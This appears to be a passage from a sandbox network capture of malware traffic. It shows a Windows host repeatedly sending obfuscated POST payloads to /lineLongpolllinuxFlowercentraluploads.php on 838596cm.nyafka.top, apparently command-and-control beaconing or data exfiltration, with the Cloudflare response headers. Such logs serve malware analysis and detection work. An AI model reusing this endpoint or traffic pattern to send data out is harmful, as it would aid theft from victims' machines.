                                                                                                          Jan 8, 2025 17:14:31.139753103 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:31.299380064 CET806INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:31 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5CnfsriI7RAy4fqls1LP0WpVJpNLjBGiih7bRRVkaIb1gWV9gWHVPThPzw3qHzsCDURZE%2FZCnfCMmsGu%2Fjz5kxpJ7BiM6L9szEnrZIEIznUtfsKXYVXPcNnX%2Fs3vPrT4G%2BrTfQCI"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b245de0c34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4507&min_rtt=1496&rtt_var=6584&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=57055&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          122192.168.2.550105104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:31.430506945 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:14:31.785587072 CET2532OUTData Raw: 50 50 5b 54 59 5f 56 5f 5e 5f 57 54 56 5f 59 58 57 52 58 5b 50 5c 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PP[TY_V_^_WTV_YXWRX[P\V[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ ((?\33!=[9[,4]>\=+X$8=+2?>Y8!;9#_&'P-#
                                                                                                          Jan 8, 2025 17:14:31.882447004 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:32.045572042 CET807INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:32 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a4wurr01n5HpnQPTpUl2q%2B096o3am1Kk27SEfF1ryicq3p2n3Iwd%2F2jLU3zIHl2VikqSW47BenHZtK7%2FffvefbpBclJrtfUqSXYa582bVV8YWEW%2FAsSzZLZ9LrksmkTUwUCpKJia"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b28faf5c34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3006&min_rtt=1449&rtt_var=3658&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=104975&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          123192.168.2.550106104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:32.183166027 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:32.535579920 CET2532OUTData Raw: 55 51 5b 50 59 58 56 59 5e 5f 57 54 56 57 59 58 57 53 58 52 50 5c 56 58 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UQ[PYXVY^_WTVWYXWSXRP\VX[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ X<+%0&*)Z,7[)!)9$?2()+ -(,?#_&'P-
                                                                                                          Jan 8, 2025 17:14:32.626050949 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:32.826174021 CET819INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:32 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lgvd%2BJG8T2Z0%2Fb%2BmHtUPXkzccPzg1mZ9kyO0w8NVIZ5%2BU8zlEnc%2BhHO73qT5JReLEk%2B1fLwO9dI8%2FjdnOKv0jAn857KbL6cYXb%2BU7XN4T%2BhDnVs%2BdIllKgNKrVpRzw6UU57TC0F3"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b2dad130f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1904&min_rtt=1627&rtt_var=1165&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=379319&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          124192.168.2.550107104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:32.963140965 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:33.316823959 CET2532OUTData Raw: 50 52 5b 57 59 5e 53 5f 5e 5f 57 54 56 5c 59 5a 57 52 58 5a 50 59 56 5d 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PR[WY^S_^_WTV\YZWRXZPYV][EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#+;7_$"=-1];4=>"=\&8>+<*/0]6?.?#_&'P-/
                                                                                                          Jan 8, 2025 17:14:33.439938068 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:33.612323999 CET802INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:33 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QAsrYTMDBiey8mx9ODbya07M5mkc2CcX5rCpvQK918NkEpzndpt5id1BQArQpxEAP1qd3naAryrKVx22Ku9VTyEPe6IyihGrwpSSoznHePIyRXnPrOh%2F%2FXwt8ePC2vcvJZf36xrO"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b32991d43b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4493&min_rtt=1576&rtt_var=6426&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=58596&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          125192.168.2.550108104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:33.741219044 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:34.098134041 CET2532OUTData Raw: 55 51 5e 52 59 59 53 5f 5e 5f 57 54 56 5a 59 5e 57 5e 58 5e 50 5b 56 5f 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UQ^RYYS_^_WTVZY^W^X^P[V_[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ ^(((30"==6,7/])X:>"'?#^>?!=#:#_&'P-7
                                                                                                          Jan 8, 2025 17:14:34.223103046 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:34.451332092 CET812INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:34 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R2WJYTMySVZTRUA%2ByC6PBtKOtF8S69terTEH1%2BsFxNMe4FQPmE%2FcRtCS8AWP2lk7JMzg6QImCVMU9n%2BZFXo%2FE5RrYLH7zO%2BGp9KZMAsZXZEnEJhYNjLAr5w8J%2FbOKjLgVT5vi8iY"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b3799600f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4110&min_rtt=1712&rtt_var=5439&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=69856&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          126192.168.2.550109104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:34.734276056 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:35.082990885 CET2532OUTData Raw: 50 52 5b 53 59 50 56 5a 5e 5f 57 54 56 5c 59 5c 57 51 58 5a 50 58 56 5e 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PR[SYPVZ^_WTV\Y\WQXZPXV^[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#+3]0 1)=Y/$<>%^(+*']&+#]*?+6=.#_&'P-/
                                                                                                          Jan 8, 2025 17:14:35.194483042 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:35.429754972 CET804INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:35 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5I63%2FkCcdrs22i6Yik8MbKrVD2T6SdDzmXDTX5wXThHCo2jDCAAuhD9hHjlkq6pnNaO6R63aS48%2Bu9dDLT6amloIXT%2BEZdtx9SBis74R7C5gEZAs7MFexlmdlDHvhusw9XiKm2Pm"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b3daad743b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3567&min_rtt=1593&rtt_var=4545&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=83980&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          127192.168.2.550110104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:35.463852882 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1828
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          128192.168.2.550111104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:35.556314945 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:35.910931110 CET2532OUTData Raw: 50 56 5e 51 59 5b 56 5d 5e 5f 57 54 56 5f 59 5c 57 53 58 5b 50 58 56 59 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PV^QY[V]^_WTV_Y\WSX[PXVY[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#?; '#"_?-:/B<>5>!&+1+18*,8!:#_&'P-#
                                                                                                          Jan 8, 2025 17:14:36.001693010 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:36.197776079 CET807INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:36 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ue%2FVF2pdXj84kBhwifgeQM4TP894MTd9jm3ARBPJYWiN8y5oBtPbgYHzQCk5t6JiwnO8Z35JhLLBPo%2FX5JfbnULCJOkPMVG5jsAhaKrJ4Vi98Ls1SIvWoqfeAPIiHMMnW%2FT%2BDgB6"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b42bc7a727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2305&min_rtt=2005&rtt_var=1352&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=331441&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          129192.168.2.550112104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:36.322587013 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:14:36.676237106 CET2532OUTData Raw: 50 57 5b 55 59 51 56 5f 5e 5f 57 54 56 5a 59 59 57 52 58 52 50 5e 56 5e 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PW[UYQV_^_WTVZYYWRXRP^V^[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ ?3$:[?.!\;73Y=-6)(9&+!?Y*Y<]"=?]-#_&'P-7
                                                                                                          Jan 8, 2025 17:14:36.769468069 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:37.007286072 CET802INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:36 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yO9%2FlPZOa%2Bq8Zx25vSLbUvkD9jgQfcqmeCSJHPzfxnUoWEwGANYHr73aN5n1UwXYHpk4KOYs1UU6fWKdUP4vJiTDoy2tDJat9IFDjafL8B1I51D7N9mngqoeNovTVijU6O5ezMbb"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b478ac343b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1553&rtt_var=631&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=835718&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          130192.168.2.550113104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:37.135581017 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:37.488749027 CET2532OUTData Raw: 55 56 5e 54 59 51 56 58 5e 5f 57 54 56 56 59 53 57 52 58 5b 50 55 56 5d 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UV^TYQVX^_WTVVYSWRX[PUV][EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#+7'3)=Y,$#]*=5[>=]&;P<"Y)<4 =#^9/#_&'P-
                                                                                                          Jan 8, 2025 17:14:37.588771105 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:37.824599981 CET811INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:37 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UfG5aHPa7erILLu8npDQqWDpDoJC04%2FIvnp0lGS%2BgIqqqQQnDfuAP2EoTcMvQvxYCELbYA1%2FFHOzBekjCe0sHbcLTz%2FvIejs0lHZCizvmzlk3lTBuahNfU%2BpLF%2BmJksXVyLmVjjM"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7b4cadd3729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3290&min_rtt=1946&rtt_var=3417&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=114978&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          131192.168.2.550114104.21.112.180
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:14:37.947565079 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:14:38.301282883 CET2532OUTData Raw: 55 5c 5b 53 5c 5a 56 5d 5e 5f 57 54 56 58 59 5f 57 57 58 52 50 58 56 5e 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U\[S\ZV]^_WTVXY_WWXRPXV^[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#(830 &?>%\/$+X*>&);*&;("<),;5=7.#_&'P-?
                                                                                                          Jan 8, 2025 17:14:38.408699036 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:14:38.642662048 CET809INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:14:38 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1jFPJUZR13ubkleZyNDuYAsncihCcT2TqNuojgmSQ8EdSc%2Fyh573HsC6gvR%2FEKvBWjFyiXGQdvawxzmd6iaXcBr%2FZBB8er80dhyb7MUzEeHNr%2FJVTRczpfqj7B46DWHRqh%2Bpce81"}],"group":"cf-nel","max_age":604800}
